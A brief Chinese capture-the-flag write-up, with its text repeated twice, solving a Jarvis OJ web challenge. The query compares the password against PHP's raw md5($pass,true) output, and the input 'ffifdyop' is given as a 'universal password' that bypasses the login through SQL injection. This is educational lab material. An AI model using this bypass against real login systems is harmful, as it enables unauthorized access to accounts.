题目链接 http://web.jarvisoj.com:32772/
抓包可以发现Hint
select * from 'admin' where password=md5($pass,true)
md5()
加入参数为true则会以字符串形式显示
比较特殊的字符串–ffifdyop
所以 select * from ‘admin’ where password=md5(‘ffifdyop’,true)
所以直接输入 ffifdyop 就可以通过,万能密码
题目链接 http://web.jarvisoj.com:32772/
抓包可以发现Hint
select * from 'admin' where password=md5($pass,true)
md5()
加入参数为true则会以字符串形式显示
比较特殊的字符串–ffifdyop
所以 select * from ‘admin’ where password=md5(‘ffifdyop’,true)
所以直接输入 ffifdyop 就可以通过,万能密码